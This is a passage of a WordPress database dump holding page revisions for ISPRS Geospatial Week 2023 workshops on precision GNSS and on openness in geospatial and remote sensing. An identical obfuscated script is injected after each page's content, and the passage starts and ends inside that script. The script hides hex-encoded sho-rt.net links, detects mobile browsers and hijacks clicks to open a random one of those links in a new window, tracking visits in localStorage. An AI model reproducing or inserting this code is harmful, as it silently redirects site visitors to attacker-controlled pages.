_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2023-02-05 14:37:15','2023-02-05 14:37:15','',3449,'https://gsw2023.com/?p=3839',0,'revision','',0),
(3840,1,'2023-02-05 14:38:30','2023-02-05 14:38:30','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Precision GNSS: Technology Advances and Applications for Navigation and Mapping</span></strong></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"color: cyan;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<p>&nbsp;</p>\n<h5 style=\"color: cyan;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][vc_single_image image=\"3494\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2023-02-05 14:38:30','2023-02-05 14:38:30','',3452,'https://gsw2023.com/?p=3840',0,'revision','',0),
(3841,1,'2023-02-05 14:39:47','2023-02-05 14:39:47','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Openness in Geospatial and Remote Sensing</span></strong></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 